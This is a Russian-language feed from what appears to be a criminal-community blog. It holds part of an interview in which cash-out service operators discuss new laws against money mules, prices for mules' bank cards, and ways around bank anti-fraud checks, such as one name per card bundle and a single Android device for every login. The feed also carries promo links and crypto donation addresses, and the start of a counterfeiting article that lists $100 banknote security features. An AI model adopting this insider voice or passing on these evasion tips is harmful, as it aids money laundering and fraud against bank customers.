  &lt;p id=&quot;kiLk&quot;&gt;Однако, организаторы схем (дроповоды), используя информационный фон вокруг поправок для создания искусственного дефицита &amp;quot;материала&amp;quot;, могут спровоцировать рост цен на доступ к платежным реквизитам на 10-20%. Это, в свою очередь, может привести к маржинальному увеличению стоимо-сти услуг по обналичиванию – в пределах 2-5% – что не является критическим фактором для рынка.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;kLfr&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;2.Что изменится сейчас для дропов, насколько данные поправки будут для них губительны?&lt;/strong&gt;&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;5kTo&quot;&gt;Следует отметить, что и до введения данных поправок судебная практика по ст. 187 УК РФ (&amp;quot;Изготов-ление или сбыт поддельных кредитных либо расчетных карт и иных платежных документов&amp;quot;) уже предусматривала значительные сроки наказания для дропов.Примером служит приговор [УИД: 30RS0009-01-2025-000307-35 от 13.03.2025 г.].&lt;/p&gt;
  &lt;p id=&quot;YoJT&quot;&gt;Ужесточение законодательства происходит на фоне выраженного общественного запроса на решительные меры противодействия крупным мошенничествам с использованием ЭСП, где дропы играют ключевую роль. Это создает предпосылки для систематиче-ского ужесточения судебных решений. Новые нормы формально закрепляют эту тенденцию, предо-ставляя правоприменителям более четкие основания.&lt;/p&gt;
  &lt;blockquote id=&quot;MzYc&quot;&gt;Дроповодам стоит быть аккуратнее, исходя из этого?&lt;/blockquote&gt;
  &lt;p id=&quot;b7jt&quot;&gt;Естественно, мой милый друг, поправки вводят отдельную уголовную ответственность для дроповодов – лиц, не являщихся клиентами операторов, но организующих приобретение, сбыт или использование ЭСП. Для них предусмотрены санкции до 6 лет лишения свободы.&lt;/p&gt;
  &lt;p id=&quot;dmQo&quot;&gt;Критически важным нововведением является институт освобождения дропа от ответственности при активном содействии следствию в изобличе-нии организаторов (дроповодов). Это кардинально повышает риски для организаторов схем, делая их деятельность значительно более уязвимой.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;UEYJ&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;3. Какие дальнешие шаги могут предпринять законодатели и к чему следуют готовиться участникам рынка?&lt;/strong&gt;&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;wZPC&quot;&gt;Прогнозируемым следующим шагом регулятора станет ужесточение режима работы с банковскими счетами нерезидентов. Ожидается введение повышенных требований к идентификации таких клиентов банками и существенное снижение пороговых значений для транзакционных лимитов, что затруднит использование данных счетов в схемах обнала.&lt;/p&gt;
  &lt;p id=&quot;Ihm8&quot;&gt;Кроме того, подготовлена новая редакция Положения Банка России об обязательных требованиях к правилам внутреннего контроля (ПВК) кредитных организаций. Ее принятие, вероятно, состоится в начале 2026 года. Ключевое изменение – переход от точечного анализа транзакций на отдельных сче-тах к комплексному мониторингу цепочки взаимосвязанных счетов. Это означает, что традиционные методы &amp;quot;реабилитации&amp;quot; реквизитов через имитацию легитимной активности (&amp;quot;прогрев&amp;quot;) утратят эф-фективность, так как алгоритмы будут оценивать легитимность операций в контексте всей связанной сети счетов.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;V856&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;4.Что же делать обнал-сервисам, неужели отмирает этот вид теневой деятельности?&lt;/strong&gt;&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;e3Wl&quot;&gt;Абсолютно нет. Спрос на услуги по легализации и обналу сохранится до тех пор, пока существует наличное денежное обращение и будет расти параллельно с распространением дистанционного мошенничества. Сервисы адаптируются к новым регуляторным условиям. Один из потенциальных сценариев развития связан со снятием ограничений на международные переводы. Это откроет окно возможностей для использования иностранных платежных систем и эквайринговых сервисов зарубежных мерчантов.&lt;/p&gt;
  &lt;figure id=&quot;1FWZ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e3/70/e370f83c-42bc-433d-8b04-b504c4333daf.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;eiI7&quot;&gt;Спасибо нашему эксперту за подробный разбор ситуации и ценные прогнозы. Теперь давайте послушаем мнение представителя обнал-сервиса — как рынок реагирует на новые вызовы и что происходит «на земле». Привет, Маск&lt;/blockquote&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;QUw4&quot; data-align=&quot;center&quot;&gt;5. Планируете ли вы пересмотр цен, процентов или условий работы в связи с рисками, которые теперь касаются не только &amp;quot;клиента&amp;quot;, но и тех, кто помогает в обналичке?&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;qKlX&quot;&gt;Привет.&lt;/p&gt;
  &lt;p id=&quot;nrGm&quot;&gt;Наши условия работы зависят, в первую очередь, от ситуации на рынке 📈. Мы крупный и старый сервис и не работаем по принципу «Нужны деньги - давайте сделаем дешевле». Наши риски уже заложены в % сервиса, а стоимость обнала, в большей степени, формирует цена на материал.&lt;/p&gt;
  &lt;p id=&quot;c1Qi&quot;&gt;Это касается классических обнал сервисов, не строящихся по принципу процессингов. Риски от этой новости для нас выросли примерно на 0%, но обнал может подорожать из-за дефицита материала, который потянет за собой рост цен на него 💰.&lt;/p&gt;
  &lt;section&gt;
    &lt;h3 id=&quot;29ml&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;6. Что-то сейчас уже предприняли в текущих реалиях?&lt;/strong&gt;&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;MWcM&quot;&gt;Как всегда - стараемся работать над стабильностью и это наш фокус 👌 Радикально, ничего в работе не изменилось, на новостях в нашем сервисе цены не растут)&lt;/p&gt;
  &lt;blockquote id=&quot;MxyE&quot;&gt;Слава Богу 😅, куда еще новостей)&lt;/blockquote&gt;
  &lt;p id=&quot;L5kc&quot;&gt;)))&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;fLKY&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;7. Интересно узнать, как оцениваете будущее рынка обналичивания в связи с последними новостями: ожидается ли консолидация — слияние мелких сервисов в более крупные структуры, или, наоборот, возможен уход крупных игроков, которые слишком завязаны на ограниченный круг поставщиков материалов и каналов?&lt;/strong&gt;&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;yrBr&quot;&gt;Можно точно прогнозировать снижение 🔻 количества опытных сервисов и увеличения мелких, недолгоживущих. Связано это, в первую очередь, с падающей рентабельностью этого бизнеса.&lt;/p&gt;
  &lt;p id=&quot;f1XU&quot;&gt;Работать в долгую здесь сложно не из-за проблем с криминалом, а банально из-за ухудшающихся условий работы (рост цен на материал, сложность его добычи, увеличение числа блокировок и тд). Но свято место пусто не бывает, эта сфера как волки в лесу - сама себя отрегулирует 🐺.&lt;/p&gt;
  &lt;blockquote id=&quot;GoGt&quot;&gt;Отлично сказано, спасибо за ответы&lt;/blockquote&gt;
  &lt;p id=&quot;d4VH&quot;&gt;Благодарим, Генри, так же хотели бы пригласить участников вашего канала в наше новое промо 🎉 на 1000$&lt;/p&gt;
  &lt;blockquote id=&quot;mNQ9&quot;&gt;Воу, с радостью, оставляем &lt;a href=&quot;https://t.me/MoneyMuskLink_bot?start=aW52aXRlcl81OTM3NzU5MDg0&quot; target=&quot;_blank&quot;&gt;ссылочку&lt;/a&gt;.&lt;/blockquote&gt;
  &lt;p id=&quot;Owxm&quot;&gt;Ссылка на активность: &lt;a href=&quot;https://t.me/MoneyMuskLink_bot?start=aW52aXRlcl81OTM3NzU5MDg0&quot; target=&quot;_blank&quot;&gt;Здесь&lt;/a&gt; . По воскресеньям ценные призы, не упускайте момент!&lt;/p&gt;
  &lt;p id=&quot;YO9A&quot;&gt;Кое-что чуть не забыл. Держи скромный «Подарок». Всё равно налоговая не спросит.&lt;/p&gt;
  &lt;figure id=&quot;4va3&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4c/c3/4cc3d6ea-23e2-491d-86ac-96d2512388c4.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;G8zt&quot;&gt;Благодарю, весит она как ползарплаты следователя?) Спасибо еще раз, надеюсь кому-то из нашей банде повезет, увидимся! А мы переходим к эксперту дебет-сервиса, приветствуем, Комерс.&lt;/blockquote&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;hcbb&quot; data-align=&quot;center&quot;&gt;8. Мы знаем, что Госдума приняла в первом чтении законопроект, который фактически объявляет войну “дропам” — тем, кто предоставляет свои банковские счета для обналичивания денег, добытых преступным путём. Что ты думаешь по этому поводу?&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;lor5&quot;&gt;Привет, бро!&lt;/p&gt;
  &lt;p id=&quot;SD6O&quot;&gt;После введения 161 фз цена выросла на 3к +- для оптовиков и на 5к для розничных покупателей, + к тому же, переслали сотрудничать с клиентами по штучной продаже. Только связки. На 1 дропа делаются все возможные карты, и высылаются в 1 руки.&lt;/p&gt;
  &lt;p id=&quot;DHHa&quot;&gt;Этот закон убил возможность раскидывать между клиентами разные банки под потребность. Выжили только оптовики с хорошим потоком леек кто может делать на любые реки.&lt;/p&gt;
  &lt;blockquote id=&quot;dDJd&quot;&gt;Закручивают гайки...&lt;/blockquote&gt;
  &lt;p id=&quot;Q79b&quot;&gt;Тут пздц ваще 😂&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;JqxU&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;9. Рынок дебета умирает, что думаешь?&lt;/strong&gt;&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;5hL5&quot;&gt;Думаю спрос теперь будет увеличиваться на курьеров наличных и на юриков. Как раньше реквизитов не будет больше на рынках. Да останутся только старички у кого есть полное понимание и денег в запасе. Новички уже хуй влезут.&lt;/p&gt;
  &lt;p id=&quot;qeW3&quot;&gt;Не реально. Щас даже фрод работает так, что 2й вход с другого айпи в лк блочит все карты на ФИО дропа без возможности перевыпуска. Теперь только так - связка на 1 ФИО + Андройд где произведены все входы в лк.&lt;/p&gt;
  &lt;blockquote id=&quot;rZqu&quot;&gt;Ризон теряется для розницы?&lt;/blockquote&gt;
  &lt;p id=&quot;RBrM&quot;&gt;Конечно, другому нету смысла вообще работать даже если цена за карту 50к.&lt;/p&gt;
  &lt;blockquote id=&quot;XHDg&quot;&gt;Понял, бро, благодарю за комментарий, надеюсь адекватные клиенты придут к тебе, без розницы, сразу оптовики)&lt;/blockquote&gt;
  &lt;p id=&quot;ZSu5&quot;&gt;Спасибо бро, я попросил счёт, на одной из карт 50 тысяч, надеюсь хватит.&lt;/p&gt;
  &lt;figure id=&quot;qJ1g&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d9/60/d960e676-bb9d-4dc1-a465-5f9dcc044bff.jpeg&quot; width=&quot;2880&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;KD9C&quot;&gt;ахаах, ну Комерс, ну старина, увидимся, благодарю. В следующий раз плачу я!&lt;/blockquote&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;HLA7&quot; data-align=&quot;center&quot;&gt;Всем спасибо за прочтение!&lt;/h2&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;Sb5C&quot;&gt;💬 Поддержите проект&lt;/h3&gt;
  &lt;p id=&quot;FV7D&quot;&gt;Если материал был вам полезен — поставьте лайк, поделитесь в каналах и с коллегами.&lt;/p&gt;
  &lt;p id=&quot;Eumf&quot;&gt;🧠 Лучшая благодарность — это развитие проекта вместе с вами. &lt;a href=&quot;http://t.me/dark_gov&quot; target=&quot;_blank&quot;&gt;Вступайте в наши ряды&lt;/a&gt; и следите за новыми выпусками — мы не остановимся.&lt;/p&gt;
  &lt;p id=&quot;Jwgm&quot;&gt;&lt;em&gt;Спасибо, что остаетесь на волне.&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;KDZv&quot;&gt;Поддержка проекта:&lt;/p&gt;
  &lt;blockquote id=&quot;Wf9S&quot;&gt;TRC20: TLSttEVXCDSJWWZ775cUvfrafYYgz2Ha4Q                                                           BTC: bc1qvrwn96agxtmyflxkjsefazzjvsp2gnc8e58zmg&lt;/blockquote&gt;

</content></entry><entry><id>parabellum_clan:Anatomiya_poddelki</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/Anatomiya_poddelki?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>Анатомия подделки</title><published>2025-06-17T09:38:16.286Z</published><updated>2025-06-17T09:38:16.286Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/87/12/871234d8-be6b-4b5f-b8d3-2fe3a298e387.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/32/76/3276f3e3-1958-4ffe-a985-97e7919ec81a.png&quot;&gt;Бонжур, дамы и господа! С вами вновь Parabellum Clan. Вы давно нас просили о материале, а мы, гады этакие, ничего не выпускали, но обилие вопросов, блуждающих в сети, всё же вынуждает сесть за печатную машинку и начать повествовать, дабы уберечь вас от ошибок. Сегодня я приоткрою для вас завесу над миром красок, станков и бумаги, которые наши дорогие товарищи фальшивомонетчики используют в своём хитром деле, а также расскажу, почему вам точно не стоит искать или покупать подобные «шедевры» в даркнете. Итак, мы начинаем...</summary><content type="html">
  &lt;figure id=&quot;LKGI&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/32/76/3276f3e3-1958-4ffe-a985-97e7919ec81a.png&quot; width=&quot;2880&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;iZJc&quot;&gt;Бонжур, дамы и господа! С вами вновь &lt;strong&gt;&lt;a href=&quot;https://t.me/+ize7XDFxbMNjNDg0&quot; target=&quot;_blank&quot;&gt;Parabellum Clan&lt;/a&gt;&lt;/strong&gt;. Вы давно нас просили о материале, а мы, гады этакие, ничего не выпускали, но обилие вопросов, блуждающих в сети, всё же вынуждает сесть за печатную машинку и начать повествовать, дабы уберечь вас от ошибок. Сегодня я приоткрою для вас завесу над миром красок, станков и бумаги, которые наши дорогие товарищи фальшивомонетчики используют в своём хитром деле, а также расскажу, почему вам точно не стоит искать или покупать подобные «шедевры» в даркнете. Итак, мы начинаем...&lt;/p&gt;
  &lt;p id=&quot;X0LI&quot;&gt;&lt;strong&gt;Содержание: &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;aimB&quot;&gt;&lt;a href=&quot;/@parabellumclan/Fq8rg25V-2D#T51i&quot;&gt;1. Фальшивомонетничество как феномен&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/Fq8rg25V-2D#yLg3&quot;&gt; 2. Современные способы защиты купюр&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/Fq8rg25V-2D#r2lN&quot;&gt; 3. Процесс изготовления купюр&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/Fq8rg25V-2D#jVO6&quot;&gt; 4. Окупаемость и затраты на старт&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/Fq8rg25V-2D#0UGk&quot;&gt; 5. Почему на дарк-рынке нет фальши?&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/Fq8rg25V-2D#W7gx&quot;&gt; 6. Расследование преступлений, связанных с подделками&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/Fq8rg25V-2D#NCfU&quot;&gt; 7. Рекомендации к защите, при обвинении в подделке купюр&lt;/a&gt;&lt;/p&gt;
  &lt;section&gt;
    &lt;h2 id=&quot;T51i&quot;&gt;1. Фальшивомонетничество как феномен&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;Qj9L&quot;&gt;Фальшивомонетничество — одно из древнейших преступлений, которое зародилось почти одновременно с самими деньгами. На протяжении веков подделка монет и банкнот менялась по форме и содержанию, приобретая всё более изощрённые методы. В то же время государства вынуждены были усиливать защиту своих денежных знаков, разрабатывать всё новые способы выявления подделок и вводить суровые наказания для фальшивомонетчиков. Рассмотрим, как эволюционировало это явление: от первых «обрезанных» монет до сложнейших операций времён Второй мировой войны. Если вы думаете &amp;quot;нахуй нам читать это?&amp;quot;, то не читайте, продвигайтесь к следующему разделу!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;0chY&quot;&gt;Первые поддельные монеты: преступление в античном мире&lt;/h3&gt;
  &lt;p id=&quot;v0u5&quot;&gt;С появлением первых монет люди начали использовать золото, серебро и бронзу в качестве универсального эквивалента стоимости. Первые чеканные монеты были не только средством обмена, но и своеобразным символом власти: выпускать их могли лишь правители или от имени государства. Однако уже тогда находились умельцы, которые стремились извлечь прибыль путём незаконных махинаций.&lt;/p&gt;
  &lt;ul id=&quot;Cbql&quot;&gt;
    &lt;li id=&quot;jj4Q&quot;&gt;&lt;strong&gt;«Обрезка» и «сплавы»&lt;/strong&gt;&lt;br /&gt;Самыми ранними способами фальсификации было так называемое «подрезание» краёв монеты, чтобы забрать часть драгоценного металла для себя. Другая популярная практика заключалась в замене части сплава на более дешёвые металлы. Когда по внешнему виду это было не заметить, подделка расходилась в обороте, хотя вес и проба страдали.&lt;/li&gt;
    &lt;li id=&quot;iWCA&quot;&gt;&lt;strong&gt;Жёсткое наказание&lt;/strong&gt;&lt;br /&gt;За подобные деяния в Древнем Риме, Древней Греции, а позднее и в Средневековье полагалось суровое наказание, вплоть до смертной казни. Правители прекрасно понимали, что фальшивомонетничество не только обманывает отдельных граждан, но и подрывает доверие к экономической системе в целом.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;1Mic&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9c/03/9c034eba-19d9-45a6-ab74-40babb1a66fd.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;bot9&quot;&gt;Переход к бумажным деньгам: новые перспективы для преступников&lt;/h3&gt;
  &lt;p id=&quot;9CFe&quot;&gt;Когда человечество начало переходить от золотых и серебряных монет к бумажным купюрам, фальшивомонетники обнаружили для себя новое «поле деятельности». В отличие от металлических денег, которые требовали дорогостоящих материалов и навыков чеканки, бумажные банкноты можно было воссоздать при наличии сходной бумаги и печатного оборудования.&lt;/p&gt;
  &lt;ul id=&quot;CNdf&quot;&gt;
    &lt;li id=&quot;xcGj&quot;&gt;&lt;strong&gt;Китайская «родина» бумажных денег&lt;/strong&gt;&lt;br /&gt;Пионером в использовании бумажных банкнот считается Китай: ещё в VIII–IX веках там уже ходили «летающие деньги» (прообразы купюр). Разумеется, начались и первые подделки, поскольку сделать чернила и нанести рисунок могло быть технически проще, чем добывать золото или серебро.&lt;/li&gt;
    &lt;li id=&quot;fNNU&quot;&gt;&lt;strong&gt;Распространение в Европе&lt;/strong&gt;&lt;br /&gt;В Европе бумажные деньги получили распространение гораздо позже, но масштаб фальшивомонетничества рос быстрее, чем институты по их защите. Государства были вынуждены внедрять водяные знаки, усложнять дизайн, использовать специальные краски и нити. Однако злоумышленники совершенствовали свои методы параллельно с технологическим прогрессом.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;lVci&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/46/48/4648eaa6-8484-46cf-8ad3-8f2d07edfbfa.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;VA2d&quot;&gt;Самая подделываемая купюра: между популярностью и незаметностью&lt;/h3&gt;
  &lt;p id=&quot;vk4Z&quot;&gt;Среди банкнот, наиболее часто подделываемых в мире, первое место неизменно занимает 100-долларовая купюра США версии 1990-го года. Её популярность связана с глобальным распространением доллара как основной резервной валюты. Более 60% всех международных финансовых операций проводится в американских долларах, что делает их основной целью фальшивомонетчиков.&lt;/p&gt;
  &lt;h3 id=&quot;VmlZ&quot;&gt;Причины популярности&lt;/h3&gt;
  &lt;ol id=&quot;tyvv&quot;&gt;
    &lt;li id=&quot;XyEK&quot;&gt;&lt;strong&gt;Широкое распространение:&lt;/strong&gt; Купюра номиналом 100 долларов США используется практически во всех странах мира. Её признают и принимают даже в тех регионах, где доллар официально не обращается.&lt;/li&gt;
    &lt;li id=&quot;fpb0&quot;&gt;&lt;strong&gt;Высокая ликвидность:&lt;/strong&gt; Обмен 100 долларов на местную валюту или использование их в расчётах проще, чем купюр с более низким номиналом.&lt;/li&gt;
    &lt;li id=&quot;PsdE&quot;&gt;&lt;strong&gt;Сложность проверки:&lt;/strong&gt; В некоторых случаях мелкие торговые точки или неофициальные обменные пункты не обладают необходимым оборудованием для проверки подлинности купюр.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;vG0J&quot;&gt;Появление поддельных 100-долларовых банкнот высокой точности вызвало подозрения, что они изготовлены не организованными преступными группами, а с участием государственных структур. Такие банкноты получили прозвище «супердоллары» и стали объектом международных расследован, но им был положен конец в 2013 году, когда Федеральная резервная система США выпустила новую версию 100-долларовой купюры с усиленной защитой.&lt;/p&gt;
  &lt;figure id=&quot;AzmB&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/25/1a/251a2b56-6e78-46e8-a7fc-df49e788908e.png&quot; width=&quot;2092&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;v7bm&quot;&gt;По информации экспертов Банка России, самой популярной у злоумышленников банкнотой в РФ остается 5 тысяч рублей образца 1997 года, такая тенденция свойственная для всех стран, ведь что может быть выгоднее и удобнее, чем подделка тех самых купюр, которые используют в той или иной стране.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;Nch5&quot;&gt;Фальшивомонетничество в СССР: жёсткая рука государства&lt;/h3&gt;
  &lt;p id=&quot;UzAn&quot;&gt;Советский Союз всегда славился строгими мерами пресечения преступлений. Борьба с фальшивомонетчиками не была исключением:&lt;/p&gt;
  &lt;ul id=&quot;9Cbt&quot;&gt;
    &lt;li id=&quot;mqdt&quot;&gt;&lt;strong&gt;Государственная монополия на полиграфию&lt;/strong&gt;&lt;br /&gt;В СССР существовал жёсткий контроль над всеми типографиями и производствами, которые могли бы теоретически выпускать деньги. Специальная бумага, особые чернила, водяные знаки — всё это держалось в строжайшем секрете и распространялось по вертикали только между доверенными предприятиями.&lt;/li&gt;
    &lt;li id=&quot;6U8N&quot;&gt;&lt;strong&gt;Репрессии и страх&lt;/strong&gt;&lt;br /&gt;За подделку денег грозило не только многолетнее заключение, но и (в тяжёлых случаях) расстрел. Поэтому крупные подпольные сети фальшивомонетчиков были крайне редки. Если же и возникали, то раскрывались в короткие сроки: наличие оборудования, необходимого для печати аналогов государственных денег, сразу привлекало внимание органов госбезопасности.&lt;/li&gt;
    &lt;li id=&quot;BjIa&quot;&gt;&lt;strong&gt;Дефицит и блестящие идеи&lt;/strong&gt;&lt;br /&gt;Иногда курьёзные случаи происходили на стыке дефицита и изобретательности. К примеру, известны случаи, когда под видом «новых купюр» преступники пытались использовать самодельные билетики, отпечатанные на каком-нибудь кустарном принтере. Как правило, это быстро пресекалось, но в послевоенные или перестроечные периоды социальная нестабильность подталкивала людей искать быстрые деньги, и некоторые «умельцы» всё же пытались заняться полиграфией.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;5ESN&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7e/10/7e10b52d-3f3c-4a8a-b44b-adcec370fe2b.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;k4Vr&quot;&gt;Немцы и фальшивые франки во времена Второй мировой&lt;/h3&gt;
  &lt;p id=&quot;mgfS&quot;&gt;Во времена Второй мировой войны нацистская Германия развернула одну из самых масштабных и амбициозных операций по подделке валюты в истории — операцию под кодовым названием «Бернхард». Её целью было подорвать экономику Великобритании, обесценив фунт стерлингов путём массового введения в оборот поддельных банкнот.&lt;/p&gt;
  &lt;ul id=&quot;G2de&quot;&gt;
    &lt;li id=&quot;qPnf&quot;&gt;&lt;strong&gt;Операция «Бернхард»&lt;/strong&gt;&lt;br /&gt;Во времена Второй мировой войны нацистская Германия развернула одну из самых масштабных и амбициозных операций по подделке валюты в истории — операцию под кодовым названием «Бернхард». Её целью было подорвать экономику Великобритании, обесценив фунт стерлингов путём массового введения в оборот поддельных банкнот.&lt;/li&gt;
    &lt;li id=&quot;hDA6&quot;&gt;&lt;strong&gt;Экономическая диверсия&lt;/strong&gt;&lt;br /&gt;Главной задачей операции было создание настолько качественных поддельных фунтов стерлингов, чтобы их невозможно было отличить от оригиналов. Эти фальшивки должны были использоваться для оплаты операций немецкой разведки за рубежом, финансирования агентурной сети и закупки ресурсов. Однако основной стратегической целью был экономический саботаж: подделки планировалось сбрасывать с самолётов над Великобританией, чтобы вызвать инфляцию и подорвать доверие к национальной валюте.&lt;/li&gt;
    &lt;li id=&quot;X04b&quot;&gt;&lt;strong&gt;Результаты операции&lt;/strong&gt;&lt;br /&gt;Первый тираж поддельных банкнот был выпущен в 1942 году. Качество фальшивок оказалось столь высоким, что даже сотрудники британских банков с трудом могли отличить их от оригиналов. Всего нацистам удалось изготовить более 130 миллионов фунтов стерлингов. Эти деньги использовались в операциях немецкой разведки и для оплаты агентов за границей. Тем не менее, план по массовому распространению фальшивок через авиацию так и не был реализован из-за изменения военной ситуации.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;I4Fd&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/83/88/838856d7-a7a9-4a79-ac10-bc83a783f76d.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;fFd9&quot;&gt;После окончания войны участники операции «Бернхард» предоставили союзникам ценную информацию о немецкой программе подделки валюты. Многие из заключённых, принимавших участие в производстве фальшивок, избежали суровых наказаний, так как их знания и опыт оказались полезными для послевоенного восстановления экономики.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;WejC&quot;&gt;Фальшивомонетничество — это непрерывная «гонка вооружений» между государственными институтами, защищающими денежные знаки, и преступниками, ищущими способы подделки. С каждой новой защитной технологией — будь то водяные знаки, голограммы или RFID-метки — фальшивомонетчики изобретают новые приёмы и инструменты. И если когда-то достаточно было наловчиться «срезать» немного серебра с монеты, то сегодня речь идёт о сложнейших полиграфических системах, компьютерном дизайне и даже печати на 3D-принтерах. Это показывает нам, как с ходом времени всё это совершенствовалась, но что же происходит сейчас?&lt;/p&gt;
  &lt;section&gt;
    &lt;h2 id=&quot;yLg3&quot;&gt;2. Современные способы защиты купюр&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;YL55&quot;&gt;Все же слышали о тех сказочных фальшивках, которые лезут в банкомат, да? Такое вполне возможно, но встретить на существующем рынке такую купюру в продаже — несказанная радость, потому что у продавца точно что-то не в порядке с головой, раз он ими торгует) Но ладно, это мои мысли, давайте разберём, какие методы защиты и их подделки есть у самой ходовой купюры мира — 100$ 2013-го года, которая пришла на замену тому самому супердоллару образца 1990-1996 года, принимают их практически в любых странах, так что рынок сбыта самый большой, а по сравнению с EURO, они имеют меньшее количество степеней защиты.&lt;/p&gt;
  &lt;figure id=&quot;lf7l&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/1d/3b/1d3b76cd-f583-4146-9224-84373426e8cc.jpeg&quot; width=&quot;3560&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;IdTS&quot;&gt;&lt;strong&gt;1. Бумага&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;VB08&quot;&gt;
    &lt;li id=&quot;bLtk&quot;&gt;&lt;strong&gt;Состав&lt;/strong&gt;: 75% хлопка, 25% льна. Бумага плотная (≈90 г/м²), имеет характерную шероховатость на ощупь.&lt;/li&gt;
    &lt;li id=&quot;jLOA&quot;&gt;&lt;strong&gt;Защитные волокна&lt;/strong&gt;: Вплетены &lt;strong&gt;красные и синие волокна&lt;/strong&gt; (видимые под УФ-светом). Их нельзя стереть, в отличие от напечатанных линий на подделках.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;6WbQ&quot;&gt;&lt;strong&gt;2. Чернила&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;X3a6&quot;&gt;
    &lt;li id=&quot;WSPA&quot;&gt;&lt;strong&gt;Цветопеременные чернила (OVI)&lt;/strong&gt;: Колокол в чернильнице меняет цвет с &lt;strong&gt;медного на зеленый&lt;/strong&gt; при наклоне купюры.&lt;/li&gt;
